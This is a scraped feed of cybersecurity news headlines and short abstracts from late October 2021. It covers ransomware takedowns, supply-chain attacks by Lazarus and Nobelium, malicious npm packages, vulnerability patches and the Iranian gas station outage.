I'm proud to announce the release of the 9th edition of the ENISA Threat Landscape (ETL) on the state of the cybersecurity threat landscape. The Europen Agency for cybersecurity ENISA releases its ENISA Threat Landscape 2021 (ETL) report,...Security Affairs
October 27, 2021 – Criminals
Hackers arrested for ‘infiltrating’ Ukraine’s health database Full Text
Abstract
The Security Service of Ukraine (SSU) has arrested a team of actors who illegally infiltrated the information system of the National Health Service of Ukraine (NHSU) and entered false vaccination entries for other people.BleepingComputer
October 27, 2021 – Vulnerabilities
Fuji Electric Patches Vulnerabilities in Factory Monitoring Software Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday published an advisory to inform organizations about these flaws and the availability of fixes.Security Week
October 27, 2021 – APT
North Korea-linked Lazarus APT targets the IT supply chain Full Text
Abstract
North Korea-linked Lazarus APT group is extending its operations and started targeting the IT supply chain on new targets. North Korea-linked Lazarus APT group is now targeting also IT supply chain, researchers from Kaspersky Lab warns. The activity...Security Affairs
October 27, 2021 – Solution
Babuk ransomware decryptor released to recover files for free Full Text
Abstract
Czech cybersecurity software firm Avast has created and released a decryption tool to help Babuk ransomware victims recover their files for free.BleepingComputer
October 27, 2021 – Hacker
Attack the block – How a security researcher cracked 70% of urban WiFi networks in one hit Full Text
Abstract
A vulnerability, discovered by Hashcat’s lead developer Jens “atom” Steube, is at the heart of the attack. This bug can be exploited to retrieve PMKID hashes to crack network passwords.The Daily Swig
October 27, 2021 – Outage
Operations at Iranian gas stations were disrupted today. Cyber attack or computer glitch? Full Text
Abstract
A cyberattack has disrupted gas stations from the National Iranian Oil Products Distribution Company (NIOPDC) across Iran. A cyber attack has disrupted gas stations from the state-owned National Iranian Oil Products Distribution Company (NIOPDC) across...Security Affairs
October 27, 2021 – Government
US bans China Telecom Americas over national security risks Full Text
Abstract
The Federal Communications Commission (FCC) has revoked China Telecom Americas' license to provide telecommunication services within the United States.BleepingComputer
October 27, 2021 – Phishing
Watch out for the Steam skin “free knife” scam Full Text
Abstract
It’s a tactic designed to scam people in the fastest way imaginable. The scammer makes a minimal effort, they send a message to potential victims on Steam or on services such as Discord.Malwarebytes Labs
October 27, 2021 – Malware
Malicious NPM libraries install ransomware, password stealer Full Text
Abstract
Malicious NPM packages pretending to be Roblox libraries are delivering ransomware and password-stealing trojans on unsuspecting users.BleepingComputer
October 26, 2021 – Malware
SquirrelWaffle Loader Malspams, Packing Qakbot, Cobalt Strike Full Text
Abstract
Say hello to what could be the next big spam player: SquirrelWaffle, which is spreading with increasing frequency via spam campaigns and infecting systems with a new malware loader.Threatpost
October 26, 2021 – Outage
Iranian gas stations out of service after distribution network hacked Full Text
Abstract
Gas stations from the National Iranian Oil Products Distribution Company (NIOPDC) have stopped working today due to what appears to be a cyberattack that affected the entire distribution network.BleepingComputer
October 26, 2021 – Hacker
Gummy Browsers Attack Lets Hackers Spoof Your Digital Identity Full Text
Abstract
Researchers at Texas A&M University and the University of Florida discovered Gummy Browsers, a new fingerprint capturing and browser spoofing attack. This attack technique can be leveraged to bypass 2FA on auth systems. While security analysts and experts will work toward addressing such ... Read MoreCyware Alerts - Hacker News
October 26, 2021 – Government
Iran blames cyberattack for nationwide gas station closures Full Text
Abstract
Iran says that a cyberattack caused nationwide closures of gas stations, according to multiple reports.The Hill
October 26, 2021 – Phishing
Over 10 Million Android Users Targeted With Premium SMS Scam Apps Full Text
Abstract
A global fraud campaign has been found leveraging 151 malicious Android apps with 10.5 million downloads to rope users into premium subscription services without their consent and knowledge. The premium SMS scam campaign — dubbed " UltimaSMS " — is believed to commenced in May 2021 and involved apps that cover a wide range of categories, including keyboards, QR code scanners, video and photo editors, spam call blockers, camera filters, and games, with most of the fraudulent apps downloaded by users in Egypt, Saudi Arabia, Pakistan, the U.A.E., Turkey, Oman, Qatar, Kuwait, the U.S., and Poland. Although a significant chunk of the apps in question has since been removed from the Google Play Store, 82 apps continued to remain available in the online marketplace as of October 19, 2021. It all starts with the apps prompting users to enter their phone numbers and email addresses to gain access to the advertised features, only to subscribe the victims to premium SMS servicThe Hacker News
October 26, 2021 – Government
After a Year of Silence, Are EU Cyber Sanctions Dead? Full Text
Abstract
The European Union has stopped issuing cyber sanctions, but it's not for lack of new attacks.Lawfare
October 26, 2021 – Criminals
Dark HunTOR: Police arrested 150 people in dark web drug bust Full Text
Abstract
Dark HunTOR: Police corps across the world have arrested 150 individuals suspected of buying or selling illicit goods on the dark web marketplace DarkMarket. A joint international operation, tracked as Dark HunTOR, conducted by law enforcement across...Security Affairs
October 26, 2021 – Education
Public Clouds & Shared Responsibility: Lessons from Vulnerability Disclosure Full Text
Abstract
Much is made of shared responsibility for cloud security. But Oliver Tavakoli, CTO at Vectra AI, notes there’s no guarantee that Azure or AWS are delivering services in a hardened and secure manner.Threatpost
October 26, 2021 – Malware
Spammers use Squirrelwaffle malware to drop Cobalt Strike Full Text
Abstract
A new malware threat named Squirrelwaffle has emerged in the wild, supporting actors with an initial foothold and a way to drop malware onto compromised systems and networks.BleepingComputer
October 26, 2021 – Malware
Magnitude EK Exploiting Chromium-based Browser Flaws Full Text
Abstract
After Internet Explorer, Magnitude Exploit Kit has been observed infecting Chromium-based browsers running on Windows OS in a series of attacks. It abuses two flaws: the first one is a remote code execution issue and the other is a privilege escalation bug. Researchers recommend ensuring timely pat ... Read MoreCyware Alerts - Hacker News
October 26, 2021 – Government
Lawmakers praise upcoming establishment of cyber bureau at State Full Text
Abstract
Lawmakers on both sides of the aisle are praising the upcoming establishment of a new cybersecurity bureau at the State Department, following years of advocacy and escalating global attacks.The Hill
October 26, 2021 – Malware
Malicious Firefox Add-ons Block Browser From Downloading Security Updates Full Text
Abstract
Mozilla on Monday disclosed it blocked two malicious Firefox add-ons installed by 455,000 users that were found misusing the Proxy API to impede downloading updates to the browser. The two extensions in question, named Bypass and Bypass XM, "interfered with Firefox in a way that prevented users who had installed them from downloading updates, accessing updated blocklists, and updating remotely configured content," Mozilla's Rachel Tublitz and Stuart Colville said . Because Proxy API can be used to proxy web requests, an abuse of the API could enable a bad actor to control the manner Firefox browser connects to the internet effectively. In addition to blocking the extensions to prevent installation by other users, Mozilla said it's pausing on approvals for new add-ons that use the proxy API until the fixes are broadly available. What's more, the California-based non-profit said it'd deployed a system add-on named " Proxy Failover " that shipsThe Hacker News
October 26, 2021 – Hacker
Expert managed to crack 70% of a 5,000 WiFi network sample in Tel Aviv Full Text
Abstract
A researcher from the security firm CyberArk has managed to crack 70% of Tel Aviv’s Wifi Networks starting from a sample of 5,000 gathered WiFi. CyberArk security researcher Ido Hoorvitch demonstrated how it is possible to crack WiFi at scale by exploiting...Security Affairs
October 26, 2021 – General
Why the Next-Generation of Application Security Is Needed Full Text
Abstract
New software and code stand at the core of everything we do, but how well is all of this new code tested? Luckily, autonomous application security is here.Threatpost
October 26, 2021 – Malware
Brutal WordPress plugin bug allows subscribers to wipe sites Full Text
Abstract
A high severity security flaw found in a WordPress plugin with more than 8,000 active installs can let authenticated attackers reset and wipe vulnerable websites.BleepingComputer
October 26, 2021 – Ransomware
Ranzy Locker Ransomware Attacked Over 30 U.S. Organizations in 2021 Full Text
Abstract
The gang has been active since at least 2020 and hit organizations from various industries. The attack vector most used by the ransomware operators are brute force attempts on RDP endpoints.Security Affairs
October 26, 2021 – Attack
Ranzy Locker ransomware hit tens of US companies in 2021 Full Text
Abstract
The FBI published a flash alert to warn of the activity of the Ranzy Locker ransomware that had already compromised tens of US companies. The FBI published a flash alert to warn of Ranzy Locker ransomware operations that had already compromised at least...Security Affairs
October 26, 2021 – Privacy
Millions of Android Users Scammed in SMS Fraud Driven by Tik-Tok Ads Full Text
Abstract
UltimaSMS leverages at least 151 apps that have been downloaded collectively more than 10 million times, to extort money through a fake premium SMS subscription service.Threatpost
October 26, 2021 – Education
Prepare for 5 cybersecurity certifications with this bundle Full Text
Abstract
With The Ultimate 2021 Cyber Security Survival Training Bundle, you get full prep for five top certifications. The included content is worth a total of $495, but you can get it today for only $29.99.BleepingComputer
October 26, 2021 – Malware
SquirrelWaffle Malware Family Leverages Malspam Emails to Deliver Qakbot, Cobalt Strike Full Text
Abstract
It provides threat actors with an initial foothold that can be used to facilitate further compromise or other malware infections depending on how attackers choose to attempt to monetize their access.Cisco Talos
October 26, 2021 – Attack
UltimaSMS subscription fraud campaign targeted millions of Android users Full Text
Abstract
UltimaSMS, a massive fraud campaign is using Android apps with million of downloads to subscribe victims to premium subscription services. Researchers from Avast have uncovered a widespread premium SMS scam on the Google Play Store, tracked as UltimaSMS,...Security Affairs
October 26, 2021 – Hacker
North Korean state hackers start targeting the IT supply chain Full Text
Abstract
North Korean-sponsored Lazarus hacking group has switched focus on new targets and was observed by Kaspersky security researchers expanding its supply chain attack capabilities.BleepingComputer
October 26, 2021 – General
72% of organizations hit by DNS attacks in the past year Full Text
Abstract
According to a survey from the Neustar International Security Council (NISC) conducted in September 2021, 72% of study participants reported experiencing a DNS attack within the last 12 months.Help Net Security
October 26, 2021 – Policy and Law
Kansas Man pleads guilty to hacking the Post Rock Rural Water District Full Text
Abstract
Kansas man Wyatt Travnichek admitted in court to tampering with the computer systems at the Post Rock Rural Water District. Kansas man Wyatt A. Travnichek pleaded guilty to tampering with the computer system at a drinking water treatment facility...Security Affairs
October 26, 2021 – Hacker
Researcher cracked 70% of WiFi networks sampled in Tel Aviv Full Text
Abstract
A researcher has managed to crack 70% of a 5,000 WiFi network sample in his hometown, Tel Aviv, to prove that home networks are severely unsecured and easy to hijack.BleepingComputer
October 26, 2021 – APT
APT trends report released for Q3 2021 Full Text
Abstract
While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering to target organizations or individuals, others refresh their toolsets and extend their scope.Kaspersky Labs
October 26, 2021 – Criminals
Police arrest 150 dark web vendors of illegal drugs and guns Full Text
Abstract
Law enforcement authorities arrested 150 suspects allegedly involved in selling and buying illicit goods on DarkMarket, the largest illegal marketplace on the dark web when it was taken down in January 2021.BleepingComputer
October 26, 2021 – Breach
Canadian Immigration Authority Leaked Some Vulnerable Afghan Citizens’ Details Full Text
Abstract
The names of several hundred vulnerable Afghans seeking refuge from the Taliban were recently leaked in emails sent in error by Immigration, Refugees and Citizenship Canada (IRCC), CBC News reported.CBC
October 26, 2021 – Criminals
Money launderers for Russian hacking groups arrested in Ukraine Full Text
Abstract
The Ukrainian cybercrime police force has arrested members of a group of money launderers and hackers at the request of U.S. intelligence services.BleepingComputer
October 26, 2021 – Business
Sonrai Security Announces $50M in Series C Funding Led by ISTARI Full Text
Abstract
Sonrai plans to use new funding to accelerate research and development and expand sales and marketing globally for the company’s industry-leading cloud security platform.Yahoo! Finance
October 26, 2021 – Government
FBI: Ranzy Locker ransomware hit at least 30 US companies this year Full Text
Abstract
The FBI said on Monday that Ranzy Locker ransomware operators had compromised at least 30 US companies this year from various industry sectors.BleepingComputer
October 26, 2021 – Outage
Suspected Cyberattack Temporarily Shuts Down Gas Stations Across Iran Full Text
Abstract
According to reports in local media and posts on social networks, the cyberattack caused NIOPDC gas stations to show the words “cyebrattack 64411” on their screens earlier in the morning.The Record
October 26, 2021 – Privacy
Australia drafts Online Privacy Bill to bolster data security Full Text
Abstract
Australia's Attorney-General has submitted the first draft of a new Online Privacy Bill that contains striking reforms over existing privacy laws.BleepingComputer
October 25, 2021 – Education
Defending Assets You Don’t Know About, Against Cyberattacks Full Text
Abstract
No security defense is perfect, and shadow IT means no company can inventory every single asset that it has. David “moose” Wolpoff, CTO at Randori, discusses strategies for core asset protection given this reality.Threatpost
October 25, 2021 – Government
Groove Calls for Cyberattacks on US as REvil Payback Full Text
Abstract
The bold move signals a looming clash between Russian ransomware groups and the U.S.Threatpost
October 25, 2021 – Malware
Mozilla blocks malicious add-ons installed by 455K Firefox users Full Text
Abstract
Mozilla blocked malicious Firefox add-ons installed by roughly 455,000 users after discovering in early June that they were abusing the proxy API to block Firefox updates.BleepingComputer
October 25, 2021 – Breach
Microsoft Says SolarWinds Hackers Compromised 14 Technology Providers to Piggyback on Customer Access Full Text
Abstract
This time, Nobelium attacking a different part of the supply chain: resellers and other technology service providers that customize, deploy and manage various technologies for their customers.Microsoft
October 25, 2021 – Attack
New hacking efforts show Russia undeterred by US actions Full Text
Abstract
A year after Russian government hackers compromised almost a dozen U.S. federal agencies, renewed efforts by the same group to target the global IT supply chain are painting a picture of a defiant Russia undeterred by U.S. efforts to clamp down on malicious cyber activity.The Hill
October 25, 2021 – Vulnerabilities
New Attack Let Attacker Collect and Spoof Browser’s Digital Fingerprints Full Text
Abstract
A "potentially devastating and hard-to-detect threat" could be abused by attackers to collect users' browser fingerprinting information with the goal of spoofing the victims without their knowledge, thus effectively compromising their privacy. Academics from Texas A&M University dubbed the attack system " Gummy Browsers ," likening it to a nearly 20-year-old " Gummy Fingers " technique that can impersonate a user's fingerprint biometrics. "The idea is that the attacker 𝐴 first makes the user 𝑈 connect to his website (or to a well-known site the attacker controls) and transparently collects the information from 𝑈 that is used for fingerprinting purposes (just like any fingerprinting website 𝑊 collects this information)," the researchers outlined. "Then, 𝐴 orchestrates a browser on his own machine to replicate and transmit the same fingerprinting information when connecting to 𝑊, fooling 𝑊 to think that 𝑈 is the one reThe Hacker News
October 25, 2021 – Criminals
Unknown ransomware gang uses SQL injection bug in BillQuick Web Suite to deploy ransomware Full Text
Abstract
An unknown ransomware gang leverages a critical SQL injection flaw in the BillQuick Web Suite time and billing solution to deploy ransomware. An unknown ransomware gang is exploiting a critical SQL injection flaw, tracked as CVE-2021-42258, in the popular...Security Affairs
October 25, 2021 – Vulnerabilities
CISA Urges Sites to Patch Critical RCE in Discourse Full Text
Abstract
The patch, urgently rushed out on Friday, is an emergency fix for the widely deployed platform, whose No. 1 most trafficked site is Amazon’s Seller Central.Threatpost
October 25, 2021 – Attack
Millions of Android users targeted in subscription fraud campaign Full Text
Abstract
A new SMS scam campaign relying upon 151 apps has been uncovered, with many of these apps managing to find their way into the Play Store where they amassed 10.5 million downloads.BleepingComputer
October 25, 2021 – Government
US Intel Warns China Could Dominate Advanced Technologies Full Text
Abstract
The warnings include a renewed effort to inform business executives, academics and local and state government officials about the risks of accepting Chinese investment or expertise in key industries.Security Week
October 25, 2021 – Solution
Hardware-grade enterprise authentication without hardware: new SIM security solution for IAM Full Text
Abstract
The average cost of a data breach, according to the latest research by IBM, now stands at USD 4.24 million , the highest reported. The leading cause? Compromised credentials, often caused by human error. Although these findings continue to show an upward trend in the wrong direction, the challenge itself is not new. What is new is the unprecedented and accelerated complexity of securing the workplace. CISOs/CIOs are dealing with legacy systems, cloud hosting, on-prem, remote workers, office based, traditional software, and SaaS. How businesses adapted was laudable, but now that employees spread across locations, offices and homes – with more than half threatening not to return to offices unless hybrid working is implemented – the challenge morphs into securing a nonuniform perimeter. We know passwords aren't sufficient. Knowledge-based access is usually fortified with other forms of multi-factor authentication (MFA), such as auth apps or FIDO tokens, and in highly sensitive caseThe Hacker News
October 25, 2021 – Vulnerabilities
A critical RCE flaw affects Discourse software, patch it now! Full Text
Abstract
US CISA urges administrators to address a critical remote code execution flaw, tracked as CVE-2021-41163, in Discourse installs. Discourse is a popular open-source Internet forum and mailing list management software application. The US CISA published...Security Affairs
October 25, 2021 – APT
Microsoft Defender ATP adds live response for Linux and macOS Full Text
Abstract
Microsoft has announced the addition of new live macOS and Linux response capabilities to Defender for Endpoint, , the enterprise version of Redmond's Windows 10 Defender antivirus.BleepingComputer
October 25, 2021 – Vulnerabilities
Researcher Earns $2 Million for Critical Vulnerability in Polygon Full Text
Abstract
A security researcher found a critical vulnerability in Polygon’s Plasma Bridge that could have allowed a malicious user to submit the same withdrawal transaction 224 times, with different exit IDs.Security Week
October 25, 2021 – Hacker
Microsoft Warns of Continued Supply-Chain Attacks by the Nobelium Hacker Group Full Text
Abstract
Nobelium, the threat actor behind the SolarWinds compromise in December 2020, has been behind a new wave of attacks that compromised 14 downstream customers of multiple cloud service providers (CSP), managed service providers (MSP), and other IT services organizations, illustrating the adversary's continuing interest in targeting the supply chain via the "compromise-one-to-compromise-many" approach. Microsoft, which disclosed details of the campaign on Monday, said it notified more than 140 resellers and technology service providers since May. Between July 1 and October 19, 2021, Nobelium is said to have singled out 609 customers, who were collectively attacked a grand total of 22,868 times. "This recent activity is another indicator that Russia is trying to gain long-term, systematic access to a variety of points in the technology supply chain and establish a mechanism for surveilling – now or in the future – targets of interest to the Russian government,"The Hacker News
October 25, 2021 – Vulnerabilities
Red TIM Research found two rare flaws in Ericsson OSS-RC component Full Text
Abstract
The Red Team Research (RTR), the bug’s research division from Italian Telecommunication firm TIM, found 2 new vulnerabilities affecting the Ericsson OSS-RC. What is the OSS (Operations Support System)? The Operations Support System – Radio...Security Affairs
October 25, 2021 – Hacker
Hackers used billing software zero-day to deploy ransomware Full Text
Abstract
An unknown ransomware group is exploiting a critical SQL injection bug found in the BillQuick Web Suite time and billing solution to deploy ransomware on their targets' networks in ongoing attacks.BleepingComputer
October 25, 2021 – Vulnerabilities
Cisco SD-WAN flaw could lead to arbitrary code execution, patch it now! Full Text
Abstract
Cisco addressed a high-severity OS command-injection vulnerability, tracked as CVE-2021-1529, in Cisco SD-WAN that could allow privilege escalation and lead to arbitrary code execution.Security Affairs
October 25, 2021 – Hacker
Hackers Exploited Popular BillQuick Billing Software to Deploy Ransomware Full Text
Abstract
Cybersecurity researchers on Friday disclosed a now-patched critical vulnerability in multiple versions of a time and billing system called BillQuick that's being actively exploited by threat actors to deploy ransomware on vulnerable systems. CVE-2021-42258 , as the flaw is being tracked as, concerns an SQL-based injection attack that allows for remote code execution and was successfully leveraged to gain initial access to an unnamed U.S. engineering company and mount a ransomware attack, American cybersecurity firm Huntress Labs said. While the issue has been addressed by BQE Software, eight other undisclosed security issues that were identified as part of the investigation are yet to be patched. According to its website , BQE Software's products are used by 400,000 users worldwide. "Hackers can use this to access customers' BillQuick data and run malicious commands on their on-premises Windows servers," Huntress Labs threat researcher Caleb Stewart saThe Hacker News
October 25, 2021 – APT
Russia-linked Nobelium APT targets orgs in the global IT supply chain Full Text
Abstract
Russia-linked Nobelium APT group has breached at least 14 managed service providers (MSPs) and cloud service providers since May 2021. The SolarWinds security breach was not isolated, Russia-linked Nobelium APT group has targeted140 managed service...Security Affairs
October 25, 2021 – Government
CISA urges admins to patch critical Discourse code execution bug Full Text
Abstract
A critical Discourse remote code execution (RCE) vulnerability tracked as CVE-2021-41163 was fixed via an urgent update by the developer on FridayBleepingComputer
October 25, 2021 – Solution
Facebook Introduces New Tool for Finding SSRF Vulnerabilities Full Text
Abstract
The new utility from Facebook features a simple interface that allows researchers to create unique internal endpoint URLs for targeting and then learn whether their URLs have been hit by SSRF attempt.Security Week
October 25, 2021 – Privacy
NYT Journalist’s iPhone infected twice with NSO Group’sPegasus spyware Full Text
Abstract
Threat actors infected the iPhone of New York Times journalist Ben Hubbard with NSO Group's Pegasus spyware between June 2018 to June 2021. The iPhone of New York Times journalist Ben Hubbard was repeatedly infected with NSO Group's Pegasus spyware....Security Affairs
October 25, 2021 – Criminals
Microsoft: Russian SVR hacked at least 14 IT supply chain firms since May Full Text
Abstract
Microsoft says the Russian-backed Nobelium threat group behind last year's SolarWinds hack is still targeting the global IT supply chain, with 140 resellers and technology service providers attacked and at least 14 breached since May 2021.BleepingComputer
October 25, 2021 – Criminals
Threat Actors Sell 50 Million Records of Moscow Drivers on Hacking Forum Full Text
Abstract
Threat actors are selling a database containing 50 million records of Moscow drivers on an underground forum for only $800. The data contains records collected between 2006 and 2019.Security Affairs
October 25, 2021 – Ransomware
Emsisoft created a free decryptor for past victims of the BlackMatter ransomware Full Text
Abstract
Experts from cybersecurity firm Emsisoft announced the availability of a free decryptor for past victims of the BlackMatter ransomware. Cybersecurity firm Emsisoft has released a free decryption tool for past victims of the BlackMatter ransomware....Security Affairs
October 24, 2021 – Attack
NYT Journalist Repeatedly Hacked with Pegasus after Reporting on Saudi Arabia Full Text
Abstract
The iPhone of New York Times journalist Ben Hubbard was repeatedly hacked with NSO Group's Pegasus spyware tool over a three-year period stretching between June 2018 to June 2021, resulting in infections twice in July 2020 and June 2021. The University of Toronto's Citizen Lab, which publicized the findings on Sunday, said the "targeting took place while he was reporting on Saudi Arabia, and writing a book about Saudi Crown Prince Mohammed bin Salman." The research institute did not attribute the infiltrations to a specific government. In a statement shared with Hubbard, the Israeli company denied its involvement in the hacks and dismissed the findings as "speculation," while noting that the journalist was not "a target of Pegasus by any of NSO's customers." To date, NSO Group is believed to have leveraged at least three different iOS exploits — namely an iMessage zero-click exploit in December 2019, a KISMET exploit targeting iOS 13The Hacker News
October 24, 2021 – Accident
BlackMatter ransomware victims quietly helped using secret decryptor Full Text
Abstract
Cybersecurity firm Emsisoft has been secretly decrypting BlackMatter ransomware victims since this summer, saving victims millions of dollars.BleepingComputer
October 24, 2021 – Phishing
Microsoft Most Imitated Brand for Phishing Attacks: Report Full Text
Abstract
Microsoft topped the list as 29% of all brand phishing attempts were related to the Redmond-based technology giant. Other impersonated brands include Amazon (13%), DHL (9%), and Bestbuy (8%).Cyware Alerts - Hacker News
October 24, 2021 – Phishing
TodayZoo phishing kit borrows the code from other kits Full Text
Abstract
Microsoft uncovered an extensive series of credential phishing campaigns that employed a custom phishing kit tracked as TodayZoo. Microsoft researchers uncovered a custom phishing kit, dubbed TodayZoo, that was used in an extensive series of credential...Security Affairs
October 24, 2021 – Solution
Microsoft 365 will get support for custom ARC configurations Full Text
Abstract
Microsoft is working on adding custom Authenticated Received Chain (ARC) configuration support to Microsoft Defender for Office 365.BleepingComputer
October 24, 2021 – APT
Telecom Sector Comes Under Attack as New APT Groups Emerge Full Text
Abstract
A new China-linked LightBasin threat actor group emerged as a new threat for telecommunication companies as researchers dug out a string of attacks designed to gather valuable information.Cyware Alerts - Hacker News
October 24, 2021 – General
Security Affairs newsletter Round 337 Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the international press subscribe here. NATO...Security Affairs
October 24, 2021 – Criminals
Ransomware Gangs Earned $590 Million in H1 2021 Full Text
Abstract
Almost $5.2 billion worth of outgoing Bitcoin transactions have been observed by FinCEN. This amount is possibly linked to the top 10 most reported ransomware strains.Cyware Alerts - Hacker News
October 24, 2021 – Government
NATO releases its first strategy for Artificial Intelligence Full Text
Abstract
This week, NATO Defence Ministers released the first-ever strategy for Artificial Intelligence (AI) that encourages the use of AI in a responsible manner. Artificial Intelligence (AI) is changing the global defence and security environment, for this...Security Affairs
October 24, 2021 – Attack
SmashEx Attack Reaches Most Secure Areas of Intel CPUs to Steal Data Full Text
Abstract
Academics from universities developed a new attack technique, dubbed SmashEx, that runs into Intel SGX and can allow adversaries to steal confidential data from Intel CPUs. The new vulnerability tracked by Intel as CVE-2021-0186 allows attackers to inject an asynchronous exception during the code ... Read MoreCyware Alerts - Hacker News
October 24, 2021 – Criminals
Threat actors offer for sale data for 50 millions of Moscow drivers Full Text
Abstract
Threat actors are offering for sale a database containing 50 million records belonging to Moscow drivers on a hacking forum for $800. Bad news for Russian drivers, threat actors are selling a database containing 50 million records belonging to Moscow...Security Affairs
October 24, 2021 – Attack
Phishing Campaign Targeting High-profile YouTubers Unmasked Full Text
Abstract
High-profile YouTube creators have been targeted with cookie-theft malware in phishing attacks, wherein hackers offered them fake collaboration opportunities. Google has identified around 15,000 actor accounts specifically created for this campaign. YouTube users are recommended to be aware of th ... Read MoreCyware Alerts - Hacker News
October 23, 2021 – Phishing
Microsoft Warns of TodayZoo Phishing Kit Used in Extensive Credential Stealing Attacks Full Text
Abstract
Microsoft on Thursday disclosed an "extensive series of credential phishing campaigns" that takes advantage of a custom phishing kit that stitched together components from at least five different widely circulated ones with the goal of siphoning user login information. The tech giant's Microsoft 365 Defender Threat Intelligence Team, which detected the first instances of the tool in the wild in December 2020, dubbed the copy-and-paste attack infrastructure " TodayZoo ." "The abundance of phishing kits and other tools available for sale or rent makes it easy for a lone wolf attacker to pick and choose the best features from these kits," the researchers said. "They put these functionalities together in a customized kit and try to reap the benefits all to themselves. Such is the case of TodayZoo." Phishing kits, often sold as one time payments in underground forums, are packaged archive files containing images, scripts, and HTML pages thatThe Hacker News
October 23, 2021 – Criminals
Feds Reportedly Hacked REvil Ransomware Group and Forced it Offline Full Text
Abstract
The Russian-led REvil ransomware gang was felled by an active multi-country law enforcement operation that resulted in its infrastructure being hacked and taken offline for a second time earlier this week, in what's the latest action taken by governments to disrupt the lucrative ecosystem. The takedown was first reported by Reuters , quoting multiple private-sector cyber experts working with the U.S. government, noting that the May cyber attack on Colonial Pipeline relied on encryption software developed by REvil associates, officially corroborating DarkSide's connections to the prolific criminal outfit. Coinciding with the development, blockchain analytics firm Elliptic disclosed that $7 million in bitcoin held by the DarkSide ransomware group were moved through a series of new wallets, with a small fraction of the amount being transferred with each transfer to make the laundered money more difficult to track and convert the funds into fiat currency throughThe Hacker News
October 23, 2021 – Breach
Popular NPM library hijacked to install password-stealers, miners Full Text
Abstract
Hackers hijacked the popular UA-Parser-JS NPM library, with millions of downloads a week, to infect Linux and Windows devices with cryptominers and password-stealing trojans in a supply-chain attack.BleepingComputer
October 23, 2021 – Criminals
Hacker sells the data for millions of Moscow drivers for $800 Full Text
Abstract
Hackers are selling a stolen database containing 50 million records of Moscow driver data on an underground forum for only $800.BleepingComputer
October 23, 2021 – Privacy
FTC: ISPs collect and monetize far more user data than you’d think Full Text
Abstract
The Federal Trade Commission (FTC) found that six largest internet service providers (ISPs) in the U.S. collect and share customers' personal data without providing them with info on how it's used or meaningful ways to control this process.BleepingComputer
October 23, 2021 – Vulnerabilities
Cisco SD-WAN flaw could lead to arbitrary code execution, patch it now! Full Text
Abstract
Cisco fixes an OS command-injection flaw, tracked as CVE-2021-1529, in Cisco SD-WAN that could allow privilege escalation and lead to arbitrary code execution. Cisco addressed a high-severity OS command-injection vulnerability, tracked as CVE-2021-1529,...Security Affairs
October 23, 2021 – Criminals
Ransomware hackers nervous, allege harassment from U.S. Full Text
Abstract
Several ransomware gangs posted lengthy anti-U.S. screeds. They appear prompted by the news that the FBI had successfully hacked and taken down another major ransomware group called REvil.NBC News
October 23, 2021 – Criminals
Feds Reportedly Hacked REvil Ransomware Group and Forced it Offline Full Text
Abstract
The Russian-led REvil ransomware gang was felled by an active multi-country law enforcement operation that resulted in its infrastructure being hacked and taken offline for a second time earlier this week, in what's the latest action taken by governments to disrupt the lucrative ecosystem. The takedown was first reported by Reuters , quoting multiple private-sector cyber experts working with the U.S. government, noting that the May cyber attack on Colonial Pipeline relied on encryption software developed by REvil associates, officially corroborating DarkSide's connections to the prolific criminal outfit. Coinciding with the development, blockchain analytics firm Elliptic disclosed that $7 million in bitcoin held by the DarkSide ransomware group were moved through a series of new wallets, with a small fraction of the amount being transferred with each transfer to make the laundered money more difficult to track and convert the funds into fiat currency throughThe Hacker News
October 23, 2021 – Criminals
After Nation-State Hackers, Cybercriminals Also Add Sliver Pentest Tool to Arsenal Full Text
Abstract
The cybercriminal group tracked as TA551 recently showed a significant change in tactics with the addition of the open-source pentest tool Sliver to its arsenal, according to cybersecurity firm Proofpoint.Security Week
October 23, 2021 – Malware
Malicious Packages Disguised as JavaScript Libraries Found Full Text
Abstract
Researchers at open-source software firm Sonatype have uncovered multiple malicious packages that disguise themselves as legitimate JavaScript libraries on npm registries to launch cryptominers on Windows, macOS and Linux machines.Gov Info Security
October 22, 2021 – Ransomware
The Week in Ransomware - October 22nd 2021 - Striking back Full Text
Abstract
Between law enforcement operations, REvil's second shut down, and ransomware gangs' response to the hacking of their servers, it has been quite the week.BleepingComputer
October 22, 2021 – Government
Top officials turn over Twitter accounts to ‘share the mic’ with Black cybersecurity experts Full Text
Abstract
Top federal officials and cybersecurity experts participated Friday in an online campaign to “share the mic” in cyber, giving control of their Twitter accounts to Black cybersecurity officials and experts in an effort to combat systemic racism.The Hill
October 22, 2021 – General
A Hypothetical Command Vision Statement for a Fictional PLA Cyber Command Full Text
Abstract
What would be the impact of other cyber powers adopting U.S. Cyber Command’s Command Vision concepts in pursuing their own security interests?Lawfare
October 22, 2021 – Vulnerabilities
Facebook SSRF Dashboard allows hunting SSRF vulnerabilities Full Text
Abstract
Facebook developed a new tool that allows security experts to look for Server-Side Request Forgery (SSRF) vulnerabilities in their software. Facebook announced to have designed a new tool, named SSRF Dashboard, that allows security researchers to search...Security Affairs
October 22, 2021 – Breach
SCUF Gaming store hacked to steal credit card info of 32,000 customers Full Text
Abstract
SCUF Gaming International, a leading manufacturer of custom PC and console controllers, is notifying customers that its website was hacked in February to plant a malicious script used to steal their credit card information.BleepingComputer
October 22, 2021 – Breach
Popular NPM Package Hijacked to Publish Crypto-mining Malware Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency on Friday warned of crypto-mining malware embedded in " UAParser.js ," a popular JavaScript NPM library with over 6 million weekly downloads, days after the NPM repository moved to get rid of three rogue packages that were found to mimic the same library. The supply-chain attack targeting the open-source library saw three different versions — 0.7.29, 0.8.0, 1.0.0 — that were published with malicious code on Thursday following a successful takeover of the maintainer's NPM account. "I believe someone was hijacking my NPM account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware," UAParser.js's developer Faisal Salman said . The issue has been patched in versions 0.7.30, 0.8.1, and 1.0.1. The development comes days after DevSecOps firm Sonatype disclosed details of three packages — okhsa, klow, and klown — that masqueraded as the user-agent striThe Hacker News
October 22, 2021 – Criminals
Groove ransomware group calls on other ransomware gangs to hit US public sector Full Text
Abstract
Groove ransomware operators call on other ransomware groups to stop competing and join the forces to fight against the US. The Groove ransomware gang is calling on other ransomware groups to attack US public sector after a an operation of of law enforcement...Security Affairs
October 22, 2021 – Ransomware
DarkSide ransomware rushes to cash out $7 million in Bitcoin Full Text
